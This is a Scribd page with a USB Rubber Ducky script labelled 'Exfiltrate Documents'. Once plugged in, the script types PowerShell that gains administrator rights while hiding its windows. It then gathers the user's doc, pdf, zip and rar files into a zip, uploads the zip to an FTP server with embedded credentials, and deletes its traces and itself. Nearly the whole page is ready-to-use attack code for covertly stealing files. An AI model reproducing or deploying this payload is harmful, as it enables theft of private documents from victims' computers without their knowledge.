Scribd
Upload
13 views3 pages

Exfiltrate Documents

This document outlines a script designed for exfiltrating documents and uploading them to an FTP server. It includes commands to create a report of user documents, compress them into a zip file, and upload the zip file to a specified FTP address. The script is executed using PowerShell with administrative privileges and cleans up temporary files after the upload.

Uploaded by

shanabuzi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
13 views3 pages

Exfiltrate Documents

This document outlines a script designed for exfiltrating documents and uploading them to an FTP server. It includes commands to create a report of user documents, compress them into a zip file, and upload the zip file to a specified FTP address. The script is executed using PowerShell with administrative privileges and cleans up temporary files after the upload.

Uploaded by

shanabuzi
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as TXT, PDF, TXT or read online on Scribd
You are on page 1/ 3

REM Author: UNC0V3R3D (UNC0V3R3D#8662 on Discord)

REM Description: Exfiltrate documents and upload them to a ftp server.


REM Version: 1.0
REM Category: Exfiltration
DELAY 800
GUI r
DELAY 1000
STRING powershell Start-Process notepad -Verb runAs
ENTER
DELAY 800
ALT y
DELAY 800
ENTER
ALT SPACE
DELAY 1000
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING $folderDateTime = (get-date).ToString('d-M-y HHmmss')
ENTER
STRING $userDir = (Get-ChildItem env:\userprofile).value + '\Ducky Report ' +
$folderDateTime
ENTER
STRING $fileSaveDir = New-Item ($userDir) -ItemType Directory
ENTER
STRING $date = get-date
ENTER
STRING $style = "<style> table td{padding-right: 10px;text-align: left;}#body
{padding:50px;font-family: Helvetica; font-size: 12pt; border: 10px solid
black;background-color:white;height:100%;overflow:auto;}#left{float:left;
background-color:#C0C0C0;width:45%;height:260px;border: 4px solid
black;padding:10px;margin:10px;overflow:scroll;}#right{background-
color:#C0C0C0;float:right;width:45%;height:260px;border: 4px solid
black;padding:10px;margin:10px;overflow:scroll;}#center{background-
color:#C0C0C0;width:98%;height:300px;border: 4px solid
black;padding:10px;overflow:scroll;margin:10px;} </style>"
ENTER
STRING $Report = ConvertTo-Html -Title 'Recon Report' -Head $style >
$fileSaveDir'/ComputerInfo.html'
ENTER
STRING $Report = $Report + "<div id=body><h1>Duck Tool Kit Report</h1><hr
size=2><br><h3> Generated on: $Date </h3><br>"
ENTER
STRING $Report = $Report + '<div id=center><h3>User Documents
(doc,docx,pdf,rar)</h3>'
ENTER
STRING $Report = $Report + (Get-ChildItem -Path $userDir -Include *.doc, *.docx,
*.pdf, *.zip, *.rar -Recurse |convertto-html Directory, Name, LastAccessTime)
ENTER
STRING $Report = $Report + '</div>'
ENTER
STRING $Report >> $fileSaveDir'/ComputerInfo.html'
ENTER
STRING function copy-ToZip($fileSaveDir){
ENTER
STRING $srcdir = $fileSaveDir
ENTER
STRING $zipFile = 'C:\Windows\Report.zip'
ENTER
STRING if(-not (test-path($zipFile))) {
ENTER
STRING set-content $zipFile ("PK" + [char]5 + [char]6 + ("$([char]0)" * 18))
ENTER
STRING (dir $zipFile).IsReadOnly = $false}
ENTER
STRING $shellApplication = new-object -com shell.application
ENTER
STRING $zipPackage = $shellApplication.NameSpace($zipFile)
ENTER
STRING $files = Get-ChildItem -Path $srcdir
ENTER
STRING foreach($file in $files) {
ENTER
STRING $zipPackage.CopyHere($file.FullName)
ENTER
STRING while($zipPackage.Items().Item($file.name) -eq $null){
ENTER
STRING Start-sleep -seconds 1 }}}
ENTER
STRING copy-ToZip($fileSaveDir)
ENTER
STRING $final = 'C:\Windows\Report.zip'
ENTER
STRING $ftpAddr = "ftp://username:[email protected]/Report.zip"
ENTER
STRING $browser = New-Object System.Net.WebClient
ENTER
STRING $url = New-Object System.Uri($ftpAddr)
ENTER
STRING $browser.UploadFile($url, $final)
ENTER
STRING remove-item $fileSaveDir -recurse
ENTER
STRING remove-item 'C:\Windows\Report.zip'
ENTER
STRING Remove-Item $MyINvocation.InvocationName
ENTER
CTRL s
DELAY 800
STRING C:\Windows\config-58477.ps1
ENTER
DELAY 1000
ALT F4
DELAY 800
GUI r
DELAY 800
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 800
ALT y
DELAY 1000
STRING mode con:cols=14 lines=1
ENTER
ALT SPACE
DELAY 800
STRING m
DELAY 1000
DOWNARROW
REPEAT 100
ENTER
STRING powershell Set-ExecutionPolicy 'Unrestricted' -Scope CurrentUser -Confirm:
$false
ENTER
DELAY 800
STRING powershell.exe -windowstyle hidden -File C:\Windows\config-58477.ps1
ENTER

You might also like